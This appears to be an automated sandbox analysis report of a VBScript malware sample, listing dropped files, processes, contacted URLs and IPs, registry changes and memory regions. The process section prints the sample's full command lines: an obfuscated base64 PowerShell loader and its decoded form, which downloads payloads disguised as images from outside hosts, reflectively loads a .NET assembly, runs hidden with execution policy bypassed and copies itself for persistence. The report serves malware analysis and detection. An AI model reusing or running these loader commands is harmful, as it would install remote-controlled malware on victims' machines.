Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
screen_shots.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Name.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lgpufyb.bvz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspmldpg.rhw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bycvimve.3kj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elfr1y0g.2xs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krolwf45.ctp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmsckbxf.ryn.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screen_shots.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTre4DgTreDkDgTreMDgTreBhDgTreDgDgTreMgBiDgTreGQDgTreNgBkDgTreDkDgTreZgDgTretDgTreGIDgTreNgBmDgTreGEDgTreLQDgTre0DgTreDYDgTreOQDgTre0DgTreC0DgTreNQDgTrezDgTreDkDgTreMDgTreDgTretDgTreDYDgTreZgDgTre1DgTreGEDgTreNDgTreBiDgTreGQDgTreNDgTreDgTre9DgTreG4DgTreZQBrDgTreG8DgTredDgTreDgTremDgTreGEDgTreaQBkDgTreGUDgTrebQDgTre9DgTreHQDgTrebDgTreBhDgTreD8DgTredDgTreB4DgTreHQDgTreLgDgTrezDgTreDIDgTreMDgTreDgTreyDgTreDEDgTrebQByDgTreG8DgTredwB4DgTreG4DgTreaDgTreBvDgTreGoDgTreLwBvDgTreC8DgTrebQBvDgTreGMDgTreLgB0DgTreG8DgTrecDgTreBzDgTreHDgTreDgTrecDgTreBhDgTreC4DgTreNgDgTre0DgTreDDgTreDgTreMwDgTre4DgTreC0DgTrebQBlDgTreHQDgTrecwB5DgTreHMDgTreLQBlDgTreGMDgTreaQBvDgTreHYDgTrebgBpDgTreC8DgTreYgDgTrevDgTreDDgTreDgTredgDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecwBpDgTreHDgTreDgTreYQBlDgTreGwDgTreZwBvDgTreG8DgTreZwDgTreuDgTreGUDgTreZwBhDgTreHIDgTrebwB0DgTreHMDgTreZQBzDgTreGEDgTreYgBlDgTreHIDgTreaQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks =
Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link)
} catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673',
'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText
= [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex
= $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex)
{ $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('890a82bd6d9f-b6fa-4694-5390-6f5a4bd4=nekot&aidem=tla?txt.32021mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'
, '1' , 'C:\ProgramData\' , 'Name'))} }
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg
|
45.74.19.84
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://45.74.19.84
|
unknown
|
||
xwv5group7001.duckdns.org
|
|||
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
https://paste.ee/Iy
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://paste.ee/d/GoCAwP
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://paste.ee:443/d/GoCAw
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
https://paste.ee/d/GoCAw
|
172.67.187.200
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://paste.ee/d/GoCAw
|
172.67.187.200
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
xwv5group7001.duckdns.org
|
163.172.59.233
|
||
paste.ee
|
172.67.187.200
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
163.172.59.233
|
xwv5group7001.duckdns.org
|
United Kingdom
|
||
45.74.19.84
|
unknown
|
United States
|
||
172.67.187.200
|
paste.ee
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
402000
|
remote allocation
|
page execute and read and write
|
||
28D1000
|
trusted library allocation
|
page read and write
|
||
29AACF17000
|
trusted library allocation
|
page read and write
|
||
243FC7DE000
|
heap
|
page read and write
|
||
29AAD6C6000
|
trusted library allocation
|
page read and write
|
||
2ECE7FC000
|
stack
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
212AAD88000
|
heap
|
page read and write
|
||
790815E000
|
unkown
|
page read and write
|
||
1F550850000
|
heap
|
page read and write
|
||
2125F53B000
|
trusted library allocation
|
page read and write
|
||
1DE826F5000
|
heap
|
page read and write
|
||
2125D380000
|
heap
|
page read and write
|
||
29AAF3DE000
|
trusted library allocation
|
page read and write
|
||
29AAE7A8000
|
trusted library allocation
|
page read and write
|
||
1F5524EB000
|
heap
|
page read and write
|
||
1F5524D4000
|
heap
|
page read and write
|
||
29AAE288000
|
trusted library allocation
|
page read and write
|
||
29AAF3BA000
|
trusted library allocation
|
page read and write
|
||
1F55073E000
|
heap
|
page read and write
|
||
2650000
|
trusted library allocation
|
page read and write
|
||
29AADEC7000
|
trusted library allocation
|
page read and write
|
||
212ACE0C000
|
trusted library allocation
|
page read and write
|
||
1F5526CC000
|
heap
|
page read and write
|
||
1F5526CD000
|
heap
|
page read and write
|
||
29AAEF5E000
|
trusted library allocation
|
page read and write
|
||
29AACA6E000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
1F550690000
|
heap
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
1F5526CE000
|
heap
|
page read and write
|
||
29AADA66000
|
trusted library allocation
|
page read and write
|
||
29AAF29A000
|
trusted library allocation
|
page read and write
|
||
29AAEAC0000
|
trusted library allocation
|
page read and write
|
||
79086F9000
|
stack
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
29AAEB57000
|
trusted library allocation
|
page read and write
|
||
2125D5B0000
|
trusted library allocation
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
29AADF38000
|
trusted library allocation
|
page read and write
|
||
243FC77E000
|
heap
|
page read and write
|
||
67FD000
|
stack
|
page read and write
|
||
29AAED8D000
|
trusted library allocation
|
page read and write
|
||
212AAFE0000
|
trusted library allocation
|
page read and write
|
||
29AAF23E000
|
trusted library allocation
|
page read and write
|
||
212C4EBA000
|
heap
|
page read and write
|
||
1DE81FE0000
|
heap
|
page read and write
|
||
2125FDDA000
|
trusted library allocation
|
page read and write
|
||
1DE805F4000
|
heap
|
page read and write
|
||
29AAE178000
|
trusted library allocation
|
page read and write
|
||
29AAC980000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
29AA82A6000
|
heap
|
page read and write
|
||
243FE72C000
|
heap
|
page read and write
|
||
29AADFDC000
|
trusted library allocation
|
page read and write
|
||
BFD80FD000
|
stack
|
page read and write
|
||
29AAF19E000
|
trusted library allocation
|
page read and write
|
||
29AAE6F8000
|
trusted library allocation
|
page read and write
|
||
29AAE6D8000
|
trusted library allocation
|
page read and write
|
||
1F5525D0000
|
heap
|
page read and write
|
||
29AA82BE000
|
heap
|
page read and write
|
||
2540000
|
trusted library allocation
|
page read and write
|
||
29AAD0C9000
|
trusted library allocation
|
page read and write
|
||
1DE82483000
|
heap
|
page read and write
|
||
29AAD856000
|
trusted library allocation
|
page read and write
|
||
212C50E0000
|
heap
|
page read and write
|
||
29AAF267000
|
trusted library allocation
|
page read and write
|
||
29AACF26000
|
trusted library allocation
|
page read and write
|
||
29AAC990000
|
trusted library allocation
|
page read and write
|
||
52EE000
|
stack
|
page read and write
|
||
29AAECDE000
|
trusted library allocation
|
page read and write
|
||
212AAF80000
|
heap
|
page read and write
|
||
29AAD586000
|
trusted library allocation
|
page read and write
|
||
29AAEDBD000
|
trusted library allocation
|
page read and write
|
||
29AAED35000
|
trusted library allocation
|
page read and write
|
||
29AAEC7D000
|
trusted library allocation
|
page read and write
|
||
29AAD06A000
|
trusted library allocation
|
page read and write
|
||
29AAE268000
|
trusted library allocation
|
page read and write
|
||
29AAE448000
|
trusted library allocation
|
page read and write
|
||
29AAE138000
|
trusted library allocation
|
page read and write
|
||
29AAD446000
|
trusted library allocation
|
page read and write
|
||
29AAD966000
|
trusted library allocation
|
page read and write
|
||
1F550733000
|
heap
|
page read and write
|
||
212C4EAF000
|
heap
|
page read and write
|
||
29AAEF3E000
|
trusted library allocation
|
page read and write
|
||
29AAED25000
|
trusted library allocation
|
page read and write
|
||
29AAE997000
|
trusted library allocation
|
page read and write
|
||
29AAE2B8000
|
trusted library allocation
|
page read and write
|
||
29AACFC6000
|
trusted library allocation
|
page read and write
|
||
1DE82482000
|
heap
|
page read and write
|
||
29AADAB6000
|
trusted library allocation
|
page read and write
|
||
29AAD194000
|
trusted library allocation
|
page read and write
|
||
29AAD486000
|
trusted library allocation
|
page read and write
|
||
29AAD1A4000
|
trusted library allocation
|
page read and write
|
||
29AAF156000
|
trusted library allocation
|
page read and write
|
||
29AADB46000
|
trusted library allocation
|
page read and write
|
||
1DE82550000
|
heap
|
page read and write
|
||
29AAD0D9000
|
trusted library allocation
|
page read and write
|
||
29AAA487000
|
trusted library allocation
|
page read and write
|
||
2125D3A3000
|
heap
|
page read and write
|
||
29AAE658000
|
trusted library allocation
|
page read and write
|
||
29AA9B60000
|
trusted library allocation
|
page read and write
|
||
29AADFD8000
|
trusted library allocation
|
page read and write
|
||
29AACD5F000
|
trusted library allocation
|
page read and write
|
||
29AA8130000
|
heap
|
page read and write
|
||
29AADDF6000
|
trusted library allocation
|
page read and write
|
||
29AAEE2E000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1F550766000
|
heap
|
page read and write
|
||
29AAF00E000
|
trusted library allocation
|
page read and write
|
||
243FE3F1000
|
heap
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
29AAD0E9000
|
trusted library allocation
|
page read and write
|
||
29AACABE000
|
trusted library allocation
|
page read and write
|
||
29AAE128000
|
trusted library allocation
|
page read and write
|
||
1DE807E5000
|
heap
|
page read and write
|
||
A90000
|
trusted library allocation
|
page read and write
|
||
243FC77F000
|
heap
|
page read and write
|
||
29AAD2E6000
|
trusted library allocation
|
page read and write
|
||
29AAEA62000
|
trusted library allocation
|
page read and write
|
||
29AAB92D000
|
trusted library allocation
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
29AACADE000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
29AACF46000
|
trusted library allocation
|
page read and write
|
||
25CC000
|
stack
|
page read and write
|
||
29AADB76000
|
trusted library allocation
|
page read and write
|
||
29AA8360000
|
heap
|
page read and write
|
||
1F550763000
|
heap
|
